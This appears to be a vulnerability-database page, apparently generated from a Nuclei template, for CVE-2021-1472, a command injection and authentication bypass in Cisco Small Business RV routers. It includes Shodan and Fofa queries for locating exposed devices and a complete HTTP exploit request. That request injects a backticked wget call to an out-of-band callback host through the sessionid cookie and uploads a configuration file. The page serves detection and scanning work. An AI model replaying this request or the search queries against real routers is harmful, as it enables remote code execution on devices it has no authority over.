🔙 목록으로 돌아가기

CVE-2021-1472: Cisco Small Business RV Series - OS Command Injection

TitleCisco Small Business RV Series - OS Command Injection
Authorgy741
SeverityCritical
ImpactSuccessful exploitation of this vulnerability can lead to unauthorized remote code execution, compromising the confidentiality, integrity, and availability of the affected device.
RemediationApply the latest security patches or firmware updates provided by Cisco to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.87334
CVE IDCVE-2021-1472
CWE IDCWE-287,CWE-119
Shodan Queryhttp.html:"Cisco rv340"http.html:"cisco rv340"
Fofa Querybody="cisco rv340"
Tags cve2021 cve packetstorm seclists auth-bypass injection cisco rce intrusive vkev vuln

🔍 Vulnerability Description

Cisco Small Business RV Series routers RV16X/RV26X versions 1.0.01.02 and before and RV34X versions 1.0.03.20 and before contain multiple OS command injection vulnerabilities in the web-based management interface. A remote attacker can execute arbitrary OS commands via the sessionid cookie or bypass authentication and upload files on an affected device.

🌐 HTTP Request

POST /upload HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Content-Length: 1044
Authorization: QUt6NkpTeTE6dmk4cW8=
Content-Type: multipart/form-data; boundary=---------------------------392306610282184777655655237536
Cookie: sessionid='`wget http://d5jn3aple0o4ta6njbdgxj8n8nfetbq4f.oast.me`'
Accept-Encoding: gzip

-----------------------------392306610282184777655655237536

Content-Disposition: form-data; name="option"



5NW9Cw1J

-----------------------------392306610282184777655655237536

Content-Disposition: form-data; name="destination"



J0I5k131j2Ku

-----------------------------392306610282184777655655237536

Content-Disposition: form-data; name="file.path"



EKsmqqg0

-----------------------------392306610282184777655655237536

Content-Disposition: form-data; name="file"; filename="config.xml"

Content-Type: application/xml



qJ57CM9

-----------------------------392306610282184777655655237536

Content-Disposition: form-data; name="filename"



JbYXJR74n.xml

-----------------------------392306610282184777655655237536

Content-Disposition: form-data; name="GXbLINHYkFI"



<input><fileType>configuration</fileType><source><location-url>FILE://Configuration/config.xml</location-url></source><destination><config-type>config-running</config-type></destination></input>

-----------------------------392306610282184777655655237536--

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-1472.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-1472.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A